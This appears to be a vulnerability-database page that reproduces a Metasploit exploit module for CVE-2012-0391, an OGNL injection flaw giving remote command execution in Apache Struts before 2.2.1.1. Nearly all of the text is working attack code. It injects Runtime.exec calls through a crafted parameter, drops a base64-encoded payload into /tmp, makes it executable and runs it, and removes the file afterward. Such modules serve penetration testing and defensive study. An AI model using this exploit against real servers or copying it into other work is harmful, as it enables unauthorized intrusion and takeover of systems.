Apache Struts <= 2.2.1.1 - Remote Command Execution

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Apache Struts <= 2.2.1.1 - Remote Command Execution vulnerabilit

                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::CmdStagerTFTP
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Apache Struts &#60;= 2.2.1.1 Remote Command Execution&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a remote command execution vulnerability in
				Apache Struts versions &#60; 2.2.1.1. This issue is caused because the
				ExceptionDelegator interprets parameter values as OGNL expressions
				during certain exception handling for mismatched data types of properties,
				which allows remote attackers to execute arbitrary Java code via a
				crafted parameter.
			},
			&#39;Author&#39;         =&#62;
				[
					&#39;Johannes Dahse&#39;, # Vulnerability discovery and PoC
					&#39;Andreas Nusser&#39;, # Vulnerability discovery and PoC
					&#39;juan vazquez&#39;, # Metasploit module
					&#39;sinn3r&#39; # Metasploit module
				],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2012-0391&#39;],
					[ &#39;OSVDB&#39;, &#39;78277&#39;],
					[ &#39;EDB&#39;, &#39;18329&#39;],
					[ &#39;URL&#39;, &#39;https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt&#39;]
				],
			&#39;Platform&#39;      =&#62; [ &#39;win&#39;, &#39;linux&#39;],
			&#39;Privileged&#39;     =&#62; true,
			&#39;Targets&#39;        =&#62;
				[
					[&#39;Windows Universal&#39;,
						{
								&#39;Arch&#39; =&#62; ARCH_X86,
								&#39;Platform&#39; =&#62; &#39;win&#39;
						}
					],
					[&#39;Linux Universal&#39;,
						{
								&#39;Arch&#39; =&#62; ARCH_X86,
								&#39;Platform&#39; =&#62; &#39;linux&#39;
						}
					],
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Jan 06 2012&#39;,
			&#39;DefaultTarget&#39; =&#62; 0))

			register_options(
				[
					Opt::RPORT(8080),
					OptString.new(&#39;TARGETURI&#39;, [ true, &#39;The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT&#39;, &#34;&#34;]),
					OptString.new(&#39;CMD&#39;, [ false, &#39;Execute this command instead of using command stager&#39;, &#34;&#34; ])
				], self.class)
	end

	def execute_command(cmd, opts = {})

		uri = String.new(datastore[&#39;TARGETURI&#39;])
		uri.gsub!(/INJECT/, &#34;&#39;%2b(%23_memberAccess[\&#34;allowStaticMethodAccess\&#34;]=true,@java.lang.Runtime@getRuntime().exec(\&#34;CMD\&#34;))%2b&#39;&#34;) if target[&#39;Platform&#39;] == &#39;win&#39;
		uri.gsub!(/INJECT/, &#34;&#39;%2b(%23_memberAccess[\&#34;allowStaticMethodAccess\&#34;]=true,@java.lang.Runtime@getRuntime().exec(\&#34;CMD\&#34;.split(\&#34;@\&#34;)))%2b&#39;&#34;) if target[&#39;Platform&#39;] == &#39;linux&#39;
		uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))

		vprint_status(&#34;Attempting to execute: #{cmd}&#34;)

		resp = send_request_raw({
			&#39;uri&#39;     =&#62; uri,
			&#39;version&#39; =&#62; &#39;1.1&#39;,
			&#39;method&#39;  =&#62; &#39;GET&#39;,
		}, 5)

	end

	def windows_stager
		exe_fname = rand_text_alphanumeric(4+rand(4)) + &#34;.exe&#34;

		print_status(&#34;Sending request to #{datastore[&#39;RHOST&#39;]}:#{datastore[&#39;RPORT&#39;]}&#34;)
		execute_cmdstager({ :temp =&#62; &#39;.&#39;})
		@payload_exe = payload_exe

		print_status(&#34;Attempting to execute the payload...&#34;)
		execute_command(@payload_exe)
	end

	def linux_stager
		cmds = &#34;/bin/sh@-c@echo LINE | tee FILE&#34;
		exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
		base64 = Rex::Text.encode_base64(exe)
		base64.gsub!(/\=/, &#34;\\u003d&#34;)
		file = rand_text_alphanumeric(4+rand(4))

		execute_command(&#34;/bin/sh@-c@touch /tmp/#{file}.b64&#34;)
		cmds.gsub!(/FILE/, &#34;/tmp/&#34; + file + &#34;.b64&#34;)
		base64.each_line do |line|
			line.chomp!
			cmd = cmds
			cmd.gsub!(/LINE/, line)
			execute_command(cmds)
		end

		execute_command(&#34;/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}&#34;)
		execute_command(&#34;/bin/sh@-c@chmod +x /tmp/#{file}&#34;)
		execute_command(&#34;/bin/sh@-c@rm /tmp/#{file}.b64&#34;)

		execute_command(&#34;/bin/sh@-c@/tmp/#{file}&#34;)
		@payload_exe = &#34;/tmp/&#34; + file
	end

	def on_new_session(client)
		if target[&#39;Platform&#39;] == &#39;linux&#39;
			print_status(&#34;Deleting #{@payload_exe} payload file&#34;)
			execute_command(&#34;/bin/sh@-c@rm #{@payload_exe}&#34;)
		else
			print_status(&#34;Windows does not allow running executables to be deleted&#34;)
			print_status(&#34;Delete the #{@payload_exe} file manually after migrating&#34;)
		end
	end

	def exploit
		if not datastore[&#39;CMD&#39;].empty?
			print_status(&#34;Executing user supplied command&#34;)
			execute_command(datastore[&#39;CMD&#39;])
			return
		end

		case target[&#39;Platform&#39;]
			when &#39;linux&#39;
				linux_stager
			when &#39;win&#39;
				windows_stager
			else
				raise RuntimeError, &#39;Unsupported target platform!&#39;
		end

		handler
	end
end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1